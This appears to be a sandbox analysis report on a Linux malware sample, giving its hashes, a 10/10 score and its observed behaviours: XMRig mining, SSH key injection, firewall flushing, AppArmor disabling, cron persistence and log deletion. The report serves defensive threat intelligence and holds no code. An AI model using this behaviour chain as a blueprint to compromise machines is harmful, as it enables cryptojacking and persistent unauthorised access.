General
-
Target
4cc8f97c2bf9cbabb2c2be292886212a_JaffaCakes118
-
Size
36KB
-
Sample
240516-ync54adf9s
-
MD5
4cc8f97c2bf9cbabb2c2be292886212a
-
SHA1
84f4412443bd6de78a9bab54a0d8a07540762173
-
SHA256
d800ac7d4b7ddb5737fdd23fe898daa25ebaf0f190bf40136e4f6c9d9ee4a5af
-
SHA512
c37fb4d6f1298eee51a2c780872027d0a331cbf032d2a8309a702d30d546d7eb4d2c62edf124b8e0249ca1f763ce3bcb2f8e65fc3c15e83d302a089b0feb2fe3
-
SSDEEP
384:2K0zocqi59R3zNz0+qrG+p+7hKixbN9kYHjuj4cT6P0TjzbloRf1Ibkb1SaN1VGN:gqi59qmP5HJiCz4D6h5Zab11V7eePj5
Malware Config
Targets
-
-
Target
4cc8f97c2bf9cbabb2c2be292886212a_JaffaCakes118
-
Size
36KB
-
MD5
4cc8f97c2bf9cbabb2c2be292886212a
-
SHA1
84f4412443bd6de78a9bab54a0d8a07540762173
-
SHA256
d800ac7d4b7ddb5737fdd23fe898daa25ebaf0f190bf40136e4f6c9d9ee4a5af
-
SHA512
c37fb4d6f1298eee51a2c780872027d0a331cbf032d2a8309a702d30d546d7eb4d2c62edf124b8e0249ca1f763ce3bcb2f8e65fc3c15e83d302a089b0feb2fe3
-
SSDEEP
384:2K0zocqi59R3zNz0+qrG+p+7hKixbN9kYHjuj4cT6P0TjzbloRf1Ibkb1SaN1VGN:gqi59qmP5HJiCz4D6h5Zab11V7eePj5
Score10/10-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Adds new SSH keys
Linux special file to hold SSH keys. The threat actor may add new keys for further remote access.
-
Executes dropped EXE
-
Flushes firewall rules
Flushes/ disables firewall rules inside the Linux kernel.
-
Attempts to change immutable files
Modifies inode attributes on the filesystem to allow changing of immutable files.
-
Creates/modifies Cron job
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
-
Deletes log files
Deletes log files on the system.
-
Disables AppArmor
Disables AppArmor security module.
-
Enumerates running processes
Discovers information about currently running processes on the system
-
Write file to user bin folder
-